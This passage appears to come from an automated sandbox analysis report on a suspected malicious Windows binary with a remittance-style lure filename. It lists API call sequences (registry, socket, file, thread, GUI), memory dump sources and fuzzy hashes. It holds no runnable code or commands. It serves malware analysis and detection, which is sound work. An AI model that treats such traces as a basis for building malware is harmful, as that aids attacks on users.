                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                      • String ID: KERNEL32.DLL$pI
                                                                      • API String ID: 637971194-197072765
                                                                      • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                      • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                      • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                      • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$_malloc
                                                                      • String ID:
                                                                      • API String ID: 1938898002-0
                                                                      • Opcode ID: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                                      • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                      • Opcode Fuzzy Hash: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                                      • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                      APIs
                                                                        • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                      • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
                                                                      • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                                                        • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                      • String ID:
                                                                      • API String ID: 3771399671-0
                                                                      • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                      • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                                      • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                      • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                      • _memmove.LIBCMT ref: 0044B555
                                                                      • _memmove.LIBCMT ref: 0044B578
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                      • String ID:
                                                                      • API String ID: 2737351978-0
                                                                      • Opcode ID: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                                      • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                      • Opcode Fuzzy Hash: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                                      • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                      APIs
                                                                      • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                      • __calloc_crt.LIBCMT ref: 00415246
                                                                      • __getptd.LIBCMT ref: 00415253
                                                                      • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                      • _free.LIBCMT ref: 0041529E
                                                                      • __dosmaperr.LIBCMT ref: 004152A9
                                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                      • String ID:
                                                                      • API String ID: 3638380555-0
                                                                      • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                      • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                      • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                      • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Copy$ClearErrorInitLast
                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                      • API String ID: 3207048006-625585964
                                                                      • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                      • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                      • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                      • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                      APIs
                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                      • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                      • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                      • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                      • _memmove.LIBCMT ref: 004656CA
                                                                      • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                      • WSACleanup.WSOCK32 ref: 00465762
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                      • String ID:
                                                                      • API String ID: 2945290962-0
                                                                      • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                      • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                      • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                      • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                      • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                      • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                      • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                      • String ID:
                                                                      • API String ID: 1457242333-0
                                                                      • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                      • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                      • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                      • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                      APIs
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ConnectRegistry_memmove_wcslen
                                                                      • String ID:
                                                                      • API String ID: 15295421-0
                                                                      • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                      • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                      • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                      • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                      APIs
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      • _wcstok.LIBCMT ref: 004675B2
                                                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                      • _wcscpy.LIBCMT ref: 00467641
                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                      • _wcslen.LIBCMT ref: 00467793
                                                                      • _wcslen.LIBCMT ref: 004677BD
                                                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                      • String ID: X
                                                                      • API String ID: 780548581-3081909835
                                                                      • Opcode ID: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                      • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                      • Opcode Fuzzy Hash: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                      • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                      APIs
                                                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                      • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                      • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                      • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                      • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                      • CloseFigure.GDI32(?), ref: 0044751F
                                                                      • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                      • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                      • String ID:
                                                                      • API String ID: 4082120231-0
                                                                      • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                      • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                      • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                      • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                      APIs
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                      • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                      • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                      • String ID:
                                                                      • API String ID: 2027346449-0
                                                                      • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                      • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                      • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                      • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                      APIs
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                      • GetMenu.USER32 ref: 0047A703
                                                                      • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                      • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                      • _wcslen.LIBCMT ref: 0047A79E
                                                                      • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                      • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                      • String ID:
                                                                      • API String ID: 3257027151-0
                                                                      • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                      • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                      • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                      • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                      APIs
                                                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
